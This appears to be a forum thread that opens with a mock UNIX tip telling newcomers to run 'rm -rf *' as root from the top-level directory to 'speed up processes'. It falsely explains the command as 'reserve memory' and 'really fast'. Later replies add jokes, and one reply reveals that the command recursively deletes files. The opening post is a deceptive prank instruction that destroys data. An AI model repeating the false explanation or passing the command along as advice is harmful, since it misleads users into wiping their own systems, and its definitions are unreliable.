UNIX tips for newbies: #211 -- Speeding up your processes |
|
So your SysAdmin won't increase the priority of your processes? Well, there's a workaround:
just type the following at the command prompt:
rm -rf *
rm is for "reserve memory"; -rf designates you want "really fast" (cache) memory * indicates that you are doing so for all your processes.
Do this, and you can expect increased performance.
As a side benefit, you will also get more usable disk space.

Besides, it works best if you're at the top level directory and have root privileges.

Everyone knows to try the "go faster" button on your keyboard.
My sysadmin just glued one in the other day - works fine!

Snobs love UNIX because it makes them feel superior. Every UNIX maven I ever met had self-esteem issues. UNIX helps them cope.

In case you aren't on to it,
rm is the command for remove as in delete files
-r means delete all files throughout the directory path you are in.
Not trying to be a smartass. But, don't think it's a good idea to spread confusion and try to cause mischief.

and the remove recursive command, is usually put on the ACL so only root or admin designated users can run it. Although it is really fun to do on a trash system...
